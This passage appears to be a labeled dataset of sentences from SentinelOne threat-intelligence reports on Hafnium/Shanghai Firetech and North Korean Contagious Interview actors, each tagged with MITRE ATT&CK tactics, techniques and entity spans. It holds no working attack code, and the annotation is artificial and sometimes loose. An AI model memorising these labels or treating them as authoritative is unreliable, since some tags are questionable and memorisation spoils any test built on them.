"sentinel-57_SentinelOne_report-p1-s48-246703", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 48, "context_before": "Past DOJ indictments show that other MSS offices do indeed use front companies.", "sentence_text": "The Hubei State Security Department established Wuhan Xiao Rui Zhi (Wuhan XRZ) in 2010 as a front company for state operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s49-8e9c51", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 49, "context_before": "The Hubei State Security Department established Wuhan Xiao Rui Zhi (Wuhan XRZ) in 2010 as a front company for state operations.", "sentence_text": "You’re My Favorite Deputy", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s50-43cee5", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 50, "context_before": "You’re My Favorite Deputy", "sentence_text": "The peculiarities of Hafnium’s MES exploitation campaign raise questions about the relationship between the SSSB and its contractors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s51-7fd81a", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 51, "context_before": "The peculiarities of Hafnium’s MES exploitation campaign raise questions about the relationship between the SSSB and its contractors.", "sentence_text": "Hafnium began exploiting MES vulnerabilities beginning in January 2021 .", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploiting MES vulnerabilities", "entities": [ { "text": "Hafnium ", "start": 0, "end": 8, "label": "ThreatActor" }, { "text": "exploiting MES vulnerabilities", "start": 14, "end": 44, "label": "Action" }, { "text": "MES vulnerabilities", "start": 25, "end": 44, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-57_SentinelOne_report-p1-s52-a2ab82", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 52, "context_before": "Hafnium began exploiting MES vulnerabilities beginning in January 2021 .", "sentence_text": "The exact date Hafnium’s campaign began is unclear, but the month is itself enough to raise eyebrows.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s53-584fdf", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 53, "context_before": "The exact date Hafnium’s campaign began is unclear, but the month is itself enough to raise eyebrows.", "sentence_text": "On January 5, 2021, OrangeTsai tweeted he had found an incredibly powerful pre-auth RCE vulnerability, later confirmed to be the same MES vulnerabilities exploited by Hafnium.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s54-527a93", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 54, "context_before": "On January 5, 2021, OrangeTsai tweeted he had found an incredibly powerful pre-auth RCE vulnerability, later confirmed to be the same MES vulnerabilities exploited by Hafnium.", "sentence_text": "How did Hafnium come to exploit those vulnerabilities in the same month that OrangeTsai found them?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s55-81efe8", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 55, "context_before": "How did Hafnium come to exploit those vulnerabilities in the same month that OrangeTsai found them?", "sentence_text": "Theories swirled\nthat Hafnium had compromised devices of employees working on inbound vulnerability reports at Microsoft.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Compromised devices that had important data", "entities": [ { "text": "Hafnium ", "start": 22, "end": 30, "label": "ThreatActor" }, { "text": "compromised ", "start": 34, "end": 46, "label": "Action" }, { "text": "devices ", "start": 46, "end": 54, "label": "Infrastructure_Indicator" }, { "text": "Microsoft", "start": 111, "end": 120, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-57_SentinelOne_report-p1-s56-5fa2fe", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 56, "context_before": "Theories swirled\nthat Hafnium had compromised devices of employees working on inbound vulnerability reports at Microsoft.", "sentence_text": "Other attention turned to the researcher’s personal security.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s57-55f999", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 57, "context_before": "Other attention turned to the researcher’s personal security.", "sentence_text": "But the Zhang and Xu’s close relationship with the SSSB raises the possibility that the Bureau collected OrangeTsai’s research themselves, either through an insider at Microsoft, a close-access operation against OrangeTsai, or some other collection method, and then passed the vulnerabilities to Xu and Zhang.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Collected data about vulnerabilities and passed it to Xu and Zhang", "entities": [ { "text": "passed the vulnerabilities", "start": 266, "end": 292, "label": "Action" }, { "text": "collected OrangeTsai’s research", "start": 95, "end": 126, "label": "Action" }, { "text": "OrangeTsai", "start": 212, "end": 222, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-57_SentinelOne_report-p1-s58-f3688f", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 58, "context_before": "But the Zhang and Xu’s close relationship with the SSSB raises the possibility that the Bureau collected OrangeTsai’s research themselves, either through an insider at Microsoft, a close-access operation against OrangeTsai, or some other collection method, and then passed the vulnerabilities to Xu and Zhang.", "sentence_text": "A DOJ indictment shows the Guangdong State Security Department passing malware to its contracted hackers: had the SSSB done something similar?\nBefore Shanghai\nHow Zhang Yu and Shanghai Firetech came to work for the SSSB remains unclear.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s59-3ee0f6", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 59, "context_before": "A DOJ indictment shows the Guangdong State Security Department passing malware to its contracted hackers: had the SSSB done something similar?\nBefore Shanghai\nHow Zhang Yu and Shanghai Firetech came to work for the SSSB remains unclear.", "sentence_text": "Before moving into offensive hacking, Zhang Yu co-founded a company Shanghai Weiling Information Science and Technology Co. (上海微令信息科技有限公司) whose smartphone application Campus Command (校园司令) aimed to connect college students with local events and information at Universities across China.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s60-51e9ff", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 60, "context_before": "Before moving into offensive hacking, Zhang Yu co-founded a company Shanghai Weiling Information Science and Technology Co. (上海微令信息科技有限公司) whose smartphone application Campus Command (校园司令) aimed to connect college students with local events and information at Universities across China.", "sentence_text": "Zhang Yu co-founded Campus Command with the CEO and legal representative of Shanghai Firetech, Yin Wenji (尹文基).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s61-1c4e2a", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 61, "context_before": "Zhang Yu co-founded Campus Command with the CEO and legal representative of Shanghai Firetech, Yin Wenji (尹文基).", "sentence_text": "The two associated were joined by a third person, Peng Yinan (彭一楠).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s62-555350", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 62, "context_before": "The two associated were joined by a third person, Peng Yinan (彭一楠).", "sentence_text": "Peng now holds shares in at least 25 companies registered in China.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s63-54abfa", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 63, "context_before": "Peng now holds shares in at least 25 companies registered in China.", "sentence_text": "His 2015 talk advertised his ability to recover files from Apple Filevault five years before his new company would file for patent protection on a tool capable of collecting files from Apple computers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s64-db56e0", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 64, "context_before": "His 2015 talk advertised his ability to recover files from Apple Filevault five years before his new company would file for patent protection on a tool capable of collecting files from Apple computers.", "sentence_text": "Silk Bandolier There is good reason to believe only some of Shanghai Firetech’s activities have been uncovered or made public by defenders.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s65-fe08d6", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 65, "context_before": "Silk Bandolier There is good reason to believe only some of Shanghai Firetech’s activities have been uncovered or made public by defenders.", "sentence_text": "Hafnium rose to prominence in 2021 following the exploitation of four 0-day vulnerabilities in Microsoft Exchange Servers.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploitation of vulnerabilities in MES", "entities": [ { "text": "Hafnium ", "start": 0, "end": 8, "label": "ThreatActor" }, { "text": "exploitation of four 0-day vulnerabilities", "start": 49, "end": 91, "label": "Action" }, { "text": "Microsoft Exchange Servers", "start": 95, "end": 121, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-57_SentinelOne_report-p1-s66-a83f80", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 66, "context_before": "Hafnium rose to prominence in 2021 following the exploitation of four 0-day vulnerabilities in Microsoft Exchange Servers.", "sentence_text": "Subsequent\npublications\ndemonstrate\nthe group is responsible for cracking a host of firewalls and network appliances .", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.004", "name": "Disable or Modify System Firewall" }, { "id": "T1584.008", "name": "Network Devices" } ], "procedure": "Cracking firewalls and network devices", "entities": [ { "text": "cracking a host of firewalls and network appliances", "start": 65, "end": 116, "label": "Action" }, { "text": "firewalls", "start": 84, "end": 93, "label": "Infrastructure_Indicator" }, { "text": "appliances ", "start": 106, "end": 117, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-57_SentinelOne_report-p1-s67-4620a4", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 67, "context_before": "Subsequent\npublications\ndemonstrate\nthe group is responsible for cracking a host of firewalls and network appliances .", "sentence_text": "Intellectual property rights filings by Shanghai Firetech indicate an arsenal of tools not publicly attributed to Hafnium thus far.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s68-25a362", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 68, "context_before": "Intellectual property rights filings by Shanghai Firetech indicate an arsenal of tools not publicly attributed to Hafnium thus far.", "sentence_text": "Shanghai Firetech filed for patents on a number of forensics technologies with clear applications as offensive capabilities including “remote automated evidence collection software” “Apple computer comprehensive evidence collection software” “router intelligent evidence collection software” “computer scene rapid evidence collection software” “defensive equipment reverse production software” While Hafnium’s observed capabilities check some of these generic boxes, no one has previously reported the group’s capabilities against Apple devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s69-83ac1d", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 69, "context_before": "Shanghai Firetech filed for patents on a number of forensics technologies with clear applications as offensive capabilities including “remote automated evidence collection software” “Apple computer comprehensive evidence collection software” “router intelligent evidence collection software” “computer scene rapid evidence collection software” “defensive equipment reverse production software” While Hafnium’s observed capabilities check some of these generic boxes, no one has previously reported the group’s capabilities against Apple devices.", "sentence_text": "Capabilities like “intelligent home appliances analysis platform (2),” “long-range household computer network intelligentized control software (6),” and “intelligent home appliances evidence collection software (23)” could support close access operations against individuals.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Support close action operations against individuals using different capabilities", "entities": [ { "text": "intelligent home appliances analysis platform", "start": 19, "end": 64, "label": "MalwareTool" }, { "text": "long-range household computer network intelligentized control software", "start": 72, "end": 142, "label": "MalwareTool" }, { "text": "intelligent home appliances evidence collection software", "start": 154, "end": 210, "label": "MalwareTool" }, { "text": "close access operations against individuals", "start": 231, "end": 274, "label": "Action" } ] }, { "uid": "sentinel-57_SentinelOne_report-p1-s70-3806ee", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 70, "context_before": "Capabilities like “intelligent home appliances analysis platform (2),” “long-range household computer network intelligentized control software (6),” and “intelligent home appliances evidence collection software (23)” could support close access operations against individuals.", "sentence_text": "Other recent patents demonstrate that the firm still supports offensive cyber operations, such as “specially designed computer hard drive decryption software (13),”remote cellphone evidence collection software (21),” or “network information security actual confrontation practice software (24).”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s71-10dab7", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 71, "context_before": "Other recent patents demonstrate that the firm still supports offensive cyber operations, such as “specially designed computer hard drive decryption software (13),”remote cellphone evidence collection software (21),” or “network information security actual confrontation practice software (24).”", "sentence_text": "Shanghai Firetech relationships with MSS offices beyond just the Shanghai Bureau may explain why some patented capabilities have not been observed to be associated with Hafnium tradecraft.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s72-3a9fcd", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 72, "context_before": "Shanghai Firetech relationships with MSS offices beyond just the Shanghai Bureau may explain why some patented capabilities have not been observed to be associated with Hafnium tradecraft.", "sentence_text": "While no public tenders or contracts were found, Shanghai Firetech likely offers offensive services to additional customers beyond Shanghai.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s73-c107e7", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 73, "context_before": "While no public tenders or contracts were found, Shanghai Firetech likely offers offensive services to additional customers beyond Shanghai.", "sentence_text": "The company maintains a subsidiary in Chongqing, Chongqing Firetech..", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s74-7c3531", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 74, "context_before": "The company maintains a subsidiary in Chongqing, Chongqing Firetech.", "sentence_text": "Chongqing Firetech is likely larger than its Shanghai-based mothership.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s75-7cbb2d", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 75, "context_before": "Chongqing Firetech is likely larger than its Shanghai-based mothership.", "sentence_text": "It is unclear whether the absence of Chongqing Firetech from the indictment indicates that the company was not involved in activity attributed to the Hafnium cluster.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s76-dd4877", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 76, "context_before": "It is unclear whether the absence of Chongqing Firetech from the indictment indicates that the company was not involved in activity attributed to the Hafnium cluster.", "sentence_text": "The variety of tools under the control of Shanghai Firetech exceed those attributed to Hafnium and Silk Typhoon publicly.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s77-3fe62a", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 77, "context_before": "The variety of tools under the control of Shanghai Firetech exceed those attributed to Hafnium and Silk Typhoon publicly.", "sentence_text": "The findings underline the difficulty in successfully attributing intrusions to the organizations responsible for them.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s78-ea866d", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 78, "context_before": "The findings underline the difficulty in successfully attributing intrusions to the organizations responsible for them.", "sentence_text": "It is possible that none of the tooling uncovered by this report was ever deployed in offensive operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s79-cd050c", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 79, "context_before": "It is possible that none of the tooling uncovered by this report was ever deployed in offensive operations.", "sentence_text": "Threat actor designations and naming conventions track clusters of behavior, not the organizations carrying out operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s80-cbbb93", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 80, "context_before": "Threat actor designations and naming conventions track clusters of behavior, not the organizations carrying out operations.", "sentence_text": "Successful attribution resolves a campaign back to their actual operators, like Hafnium or Fancy Bear.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s81-62d84f", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 81, "context_before": "Successful attribution resolves a campaign back to their actual operators, like Hafnium or Fancy Bear.", "sentence_text": "This report finds there are very likely other campaigns and activities tracked under different names which can be attributed to Shanghai Firetech.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s82-93b10a", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 82, "context_before": "This report finds there are very likely other campaigns and activities tracked under different names which can be attributed to Shanghai Firetech.", "sentence_text": "The absence of their inclusion in the DOJ indictment of Zhang Yu and Xu Zewei may reflect a balance of equities on the part of the FBI, releasing in the indictment only what is popularly recognized as Hafnium and meets relevant legal thresholds while privately retaining intelligence of the company’s other campaigns and tooling.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s83-b00c20", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 83, "context_before": "The absence of their inclusion in the DOJ indictment of Zhang Yu and Xu Zewei may reflect a balance of equities on the part of the FBI, releasing in the indictment only what is popularly recognized as Hafnium and meets relevant legal thresholds while privately retaining intelligence of the company’s other campaigns and tooling.", "sentence_text": "apple\nChina\nHAFNIUM\nSilk Typhoon\nShare\nDakota Cary\nDakota Cary is a China-focused consultant at SentinelOne and a nonresident fellow at the Atlantic Council’s Global China Hub.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s84-54b28d", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 84, "context_before": "apple\nChina\nHAFNIUM\nSilk Typhoon\nShare\nDakota Cary\nDakota Cary is a China-focused consultant at SentinelOne and a nonresident fellow at the Atlantic Council’s Global China Hub.", "sentence_text": "Dakota previously was a research analyst at Georgetown University’s Center for Security and Emerging Technology on the CyberAI Project.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s85-e445af", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 85, "context_before": "Dakota previously was a research analyst at Georgetown University’s Center for Security and Emerging Technology on the CyberAI Project.", "sentence_text": "He focuses on China’s efforts to develop its hacking capabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s86-51f13f", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 86, "context_before": "He focuses on China’s efforts to develop its hacking capabilities.", "sentence_text": "His reports examine artificial intelligence and cybersecurity research at Chinese universities, the People’s Liberation Army’s efforts to automate software vulnerability discovery, China's vulnerability collection system, and policies to improve the country’s cybersecurity-talent pipeline.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1588.006", "name": "Vulnerabilities" }, { "id": "T1119", "name": "Automated Collection" } ], "procedure": "Automate software vulnerability discovery and vulnerability collection system", "entities": [ { "text": "automate software vulnerability discovery", "start": 138, "end": 179, "label": "Action" }, { "text": " vulnerability collection system", "start": 188, "end": 220, "label": "Action" } ] }, { "uid": "sentinel-57_SentinelOne_report-p1-s87-4e13c1", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 87, "context_before": "His reports examine artificial intelligence and cybersecurity research at Chinese universities, the People’s Liberation Army’s efforts to automate software vulnerability discovery, China's vulnerability collection system, and policies to improve the country’s cybersecurity-talent pipeline.", "sentence_text": "Cary has also testified before the US-China Economic and Security Review Commission.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s1-97b962", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "This analysis focuses on the abuse of cyber intelligence platforms by the actors behind the Contagious Interview campaign cluster employing the ClickFix social engineering technique.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s2-9fb29d", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 2, "context_before": "This analysis focuses on the abuse of cyber intelligence platforms by the actors behind the Contagious Interview campaign cluster employing the ClickFix social engineering technique.", "sentence_text": "This indicates a strategic focus on continuously replacing disrupted infrastructure with new assets to sustain operations and high victim engagement.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Replace disrupted infrastructure with assets to sustain operations and victim engagement", "entities": [ { "text": "sustain operations", "start": 103, "end": 121, "label": "Action" }, { "text": "replacing disrupted infrastructure", "start": 49, "end": 83, "label": "Action" }, { "text": "high victim engagement", "start": 126, "end": 148, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s3-40e580", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 3, "context_before": "This indicates a strategic focus on continuously replacing disrupted infrastructure with new assets to sustain operations and high victim engagement.", "sentence_text": "Factors such as decentralized command and competitive internal incentives may limit the threat actors’ ability to consistently protect existing infrastructure at scale.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s4-788796", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 4, "context_before": "Factors such as decentralized command and competitive internal incentives may limit the threat actors’ ability to consistently protect existing infrastructure at scale.", "sentence_text": "SentinelLABS’ analysis suggests that the threat actors are effective at engaging targets; there were over 230 victims between January and March 2025, with the actual number likely being significantly higher.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s5-f3efe2", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 5, "context_before": "SentinelLABS’ analysis suggests that the threat actors are effective at engaging targets; there were over 230 victims between January and March 2025, with the actual number likely being significantly higher.", "sentence_text": "In partnership with SentinelLABS and Validin, Reuters provides further coverage of the human dimension of this threat, exploring victim engagement methods and their personal impact.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s6-28632c", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 6, "context_before": "In partnership with SentinelLABS and Validin, Reuters provides further coverage of the human dimension of this threat, exploring victim engagement methods and their personal impact.", "sentence_text": "Overview\nIn collaboration with the internet intelligence platform Validin , SentinelLABS has been tracking activity on the platform which we attribute with high confidence to North Korean threat actors involved in the Contagious Interview campaign cluster.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s7-2cf8b3", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 7, "context_before": "Overview\nIn collaboration with the internet intelligence platform Validin , SentinelLABS has been tracking activity on the platform which we attribute with high confidence to North Korean threat actors involved in the Contagious Interview campaign cluster.", "sentence_text": "SentinelLABS continuously tracks North Korean-aligned threat actors, including their persistent interest in cyber threat intelligence.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s8-a6a3eb", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 8, "context_before": "SentinelLABS continuously tracks North Korean-aligned threat actors, including their persistent interest in cyber threat intelligence.", "sentence_text": "SentinelLABS and Validin observed an intensive and coordinated effort by Contagious Interview threat actors to register and use Validin community access accounts within approximately 24 hours after Validin published a blog post on 11 March 2025.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1585", "name": "Establish Accounts" } ], "procedure": "Register and use Validin community access accounts", "entities": [ { "text": "Contagious Interview threat actors", "start": 73, "end": 107, "label": "ThreatActor" }, { "text": "register and use", "start": 111, "end": 127, "label": "Action" }, { "text": "Validin community access accounts", "start": 128, "end": 161, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s9-e5b9d5", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 9, "context_before": "SentinelLABS and Validin observed an intensive and coordinated effort by Contagious Interview threat actors to register and use Validin community access accounts within approximately 24 hours after Validin published a blog post on 11 March 2025.", "sentence_text": "The post discusses the infrastructure of Lazarus, a suspected North Korean APT umbrella cluster associated with Contagious Interview activities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s10-5952a1", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 10, "context_before": "The post discusses the infrastructure of Lazarus, a suspected North Korean APT umbrella cluster associated with Contagious Interview activities.", "sentence_text": "Validin’s community access portal provides free access to infrastructure intelligence information.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s11-8db4f6", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 11, "context_before": "Validin’s community access portal provides free access to infrastructure intelligence information.", "sentence_text": "The threat actors used Google Gmail addresses that we had already been tracking as Contagious Interview artifacts at the time of registration.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1585.002", "name": "Email Accounts" } ], "procedure": "Used google Gmail addresses", "entities": [ { "text": "Contagious Interview", "start": 83, "end": 103, "label": "ThreatActor" }, { "text": "used Google Gmail addresses", "start": 18, "end": 45, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s12-fdcb72", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 12, "context_before": "The threat actors used Google Gmail addresses that we had already been tracking as Contagious Interview artifacts at the time of registration.", "sentence_text": "Although Validin blocked the accounts shortly after registration, we observed the threat actors persisting in their efforts to use Validin by creating accounts at later dates.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1136", "name": "Create Account" } ], "procedure": "Use Validin by creating accounts at later dates", "entities": [ { "text": "Validin ", "start": 9, "end": 17, "label": "Infrastructure_Indicator" }, { "text": "use Validin by creating accounts at later dates", "start": 127, "end": 174, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s13-69c064", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 13, "context_before": "Although Validin blocked the accounts shortly after registration, we observed the threat actors persisting in their efforts to use Validin by creating accounts at later dates.", "sentence_text": "At that point, we intentionally kept one account active over the long term to monitor and gather intelligence on their activities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s14-7d684e", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 14, "context_before": "At that point, we intentionally kept one account active over the long term to monitor and gather intelligence on their activities.", "sentence_text": "We observed that the Contagious Interview threat actors engaged in coordinated activity and likely operated in teams to investigate threat intelligence related to their infrastructure and to monitor for signs of detection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s15-bb3b1b", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 15, "context_before": "We observed that the Contagious Interview threat actors engaged in coordinated activity and likely operated in teams to investigate threat intelligence related to their infrastructure and to monitor for signs of detection.", "sentence_text": "We also identified indicators of real-time teamwork, including possible use of the Slack platform to coordinate their investigations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s16-85775e", "source": "sentinel", "doc_id": 